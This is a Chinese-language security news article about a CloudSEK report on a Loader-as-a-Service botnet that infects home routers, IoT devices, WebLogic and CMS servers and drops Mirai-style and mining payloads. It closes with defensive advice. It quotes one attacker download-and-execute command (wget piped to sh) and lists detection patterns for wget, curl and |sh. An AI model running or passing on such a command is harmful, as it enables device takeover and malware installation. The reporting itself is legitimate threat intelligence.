新型僵尸网络"加载器即服务"将家用路由器和物联网变成Mirai农场

CloudSEK发现了一个持续六个月的复杂Loader-as-a-Service僵尸网络活动，利用暴露的命令与控制日志对SOHO路由器、嵌入式Linux设备和企业应用程序进行协同攻击。

威胁行为者利用未过滤的POST参数（如NTP、syslog和hostname字段），以及WebLogic、WordPress和vBulletin系统中的默认凭证和已知CVE漏洞来实现远程代码执行。

2025年7月至8月期间，攻击量激增230%，投放包括Morte二进制文件和加密货币挖矿载荷在内的多架构恶意软件。CloudSEK持续监控该行动，并已提醒技术栈与目标向量匹配的受影响客户。

攻击技术分析

CloudSEK的TRIAD团队在例行扫描恶意基础设施时首次识别到此操作。服务器包含威胁行为者在过去6个月内发布的命令与控制日志，这些日志揭示了他们的攻击向量和使用的基础设施。

暴露的控制面板日志显示了一系列有条不紊的模块，每个模块对应攻击链中的一个阶段。方括号中的关键日志标记表示不同功能：

• [ReplyPageLogin]：捕获针对Web管理界面的登录尝试，记录默认凭证探测和暴力破解
• [ConfigSystemCommand]和[SystemCommand]：记录注入命令，如wget -qO- http://IP/rondo.*.sh | sh、busybox获取或基于TFTP/FTP的链式操作
• [ReplyErrorPage]和[ReplySuccessPage]：指示执行失败或确认，指导操作员的重试逻辑或标记受损主机
• [ReplyDeviceInfo]：记录攻击后侦察，收集MAC地址、固件版本和可达服务

攻击目标范围

该活动系统性地针对：

• 通过控制台/servlet RCE攻击Oracle WebLogic服务器
• 通过易受攻击的UI页面和未过滤字段攻击SOHO路由器
• 通过投放多架构二进制文件攻击嵌入式Linux设备
• 通过已知CVE漏洞攻击CMS平台

防护建议

检测措施

• 实施Sigma规则检测包含wget、curl或|sh的可疑POST参数
• 部署Suricata/Snort正则表达式警报检测HTTP体中的下载执行模式
• 监控异常的JSON-RPC流量

预防措施

• 实施严格的出口过滤，仅允许白名单更新服务器
• 将物联网和嵌入式设备与核心生产网络隔离
• 通过VPN或跳板机加强Web UI访问安全

响应措施

• 隔离显示外发挖矿流量或异常执行的设备
• 收集取证证据：shell命令日志、进程树和临时文件系统内容
• 重镜像或更换无法修补的设备

CloudSEK预测该Loader-as-a-Service操作将继续演进，扩大设备目标和载荷复杂度。需要持续监控、快速修复和分层防御策略来应对这一新兴威胁。